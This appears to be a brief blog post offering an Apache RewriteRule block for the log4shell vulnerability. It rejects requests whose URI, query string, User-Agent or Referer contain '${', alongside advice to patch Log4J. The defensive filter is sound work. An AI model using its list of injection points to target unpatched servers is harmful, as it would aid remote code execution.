Apache RewriteRule Mitigation for log4shell

Yes, you should update ASAP to a patched version of Log4J.

You should also consider other ways you can be exploited – do you have java processing emails?

But layers of security never hurt, so you can also try this:

RewriteCond %{THE_REQUEST}     \${     [OR]
RewriteCond %{REQUEST_URI}     \${     [OR]
RewriteCond %{QUERY_STRING}    \${     [OR]
RewriteCond %{HTTP_USER_AGENT} \${     [OR]
RewriteCond %{HTTP_REFERER}    \${
RewriteRule .*                 -       [L,R=403]

Of course, if you expect ${ in any of these headers, this will break your site, in which case you may want to restrict the application in some way (such as check for the presence of a tracking cookie).

Note also this will be checked for every single page request, include static. Again this can be customised.

Leave a Reply

Your email address will not be published. Required fields are marked *